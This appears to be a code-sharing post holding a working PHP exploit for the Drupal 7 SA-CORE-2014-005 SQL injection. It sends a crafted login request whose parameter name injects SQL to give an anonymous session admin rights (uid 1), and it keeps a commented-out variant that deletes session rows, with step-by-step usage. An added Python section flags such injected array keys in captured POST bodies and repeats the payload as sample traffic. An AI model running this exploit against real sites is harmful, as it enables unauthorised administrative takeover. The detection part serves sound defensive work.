This is another PoC for the SA-CORE-2014-005 vulnerability. Instead of updating the users table, it activates an anonymous session to change your session into an admin session.
<?php
/**
 * D7 autologin.
 *
 * Exploits SA-CORE-2014-005 to change your anonymous session into a uid 1 session.
 * In order to work, first you need to have an anonymous session in the sessions table.
 * One way to achieve this is to go to the update.php page.
 *
 * Usage: php d7-autologin.php
 * Change the IP with your IP address.
 * After that, you should have access to the site by refreshing the page.
 *
 * This script is based on the one found here:
 */

$url = $argv[1];
$hostname = $argv[2];

echo "Usage: php script.php [Your IP address]\n";
echo "This script works by updating the sessions table. For that, you need to create a session in the DB as an anonymous user. An easy way is to get an access denied on the update.php page. Just go to:\n";
echo $url . "/update.php\n";

$post_data = "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
//$post_data = "name[0%20;delete+from+sessions+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
  'http' => array(
    'method' => 'POST',
    'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
    'content' => $post_data
  )
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', false, $ctx);

// The check below looks for a PHP warning text in the response body.
if ($data && stristr($data, 'mb_strlen() expects parameter 1 to be string')) {
  echo "Success! Just refresh the update.php page you loaded before.\n";
}
else {
  echo "Error! Either the website isn't vulnerable, or your Internet isn't working.\n";
}
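
For defenders reviewing captured POST bodies (for example from a reverse proxy or WAF body log), the request above stands out because the SQL sits in the array key of a parameter name, not in a value. The following is an added example, not part of the gist; the function names, the sample rows and the rule that legitimate keys are plain identifiers are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: legitimate Drupal form array keys are plain identifiers or
# integer indexes, e.g. name[0] or body[und][0][value].
SAFE_KEY = re.compile(r"[A-Za-z0-9_-]*")
BRACKETED = re.compile(r"\[([^\]]*)\]")


def suspicious_names(body):
    """Return decoded parameter names that carry a non-identifier array key."""
    hits = []
    # separator="&" keeps ';' inside a name instead of splitting on it.
    for name, _value in parse_qsl(body, keep_blank_values=True, separator="&"):
        keys = BRACKETED.findall(name)
        if any(not SAFE_KEY.fullmatch(key) for key in keys):
            hits.append(name)
    return hits


def scan(requests):
    """requests: iterable of (source_ip, path, body). Returns flagged rows."""
    flagged = []
    for source_ip, path, body in requests:
        names = suspicious_names(body)
        if names:
            flagged.append((source_ip, path, names))
    return flagged


# Constructed sample traffic (not captured from a real site). The third row
# has the shape of the request built by the script above; IPs are
# documentation addresses.
SAMPLE = [
    ("198.51.100.20", "/?q=node&destination=node",
     "name=alice&pass=secret&form_build_id=form-abc"
     "&form_id=user_login_block&op=Log+in"),
    ("198.51.100.21", "/node/add/article",
     "title=Hello&body[und][0][value]=text&form_id=article_node_form"),
    ("203.0.113.7", "/?q=node&destination=node",
     "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'203.0.113.7'"
     ";;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id="
     "&form_id=user_login_block&op=Log+in"),
]

if __name__ == "__main__":
    for ip, path, names in scan(SAMPLE):
        print(ip, path, names)
```

Only the third row is flagged; the nested `body[und][0][value]` field and the plain `name[0]` key pass the check.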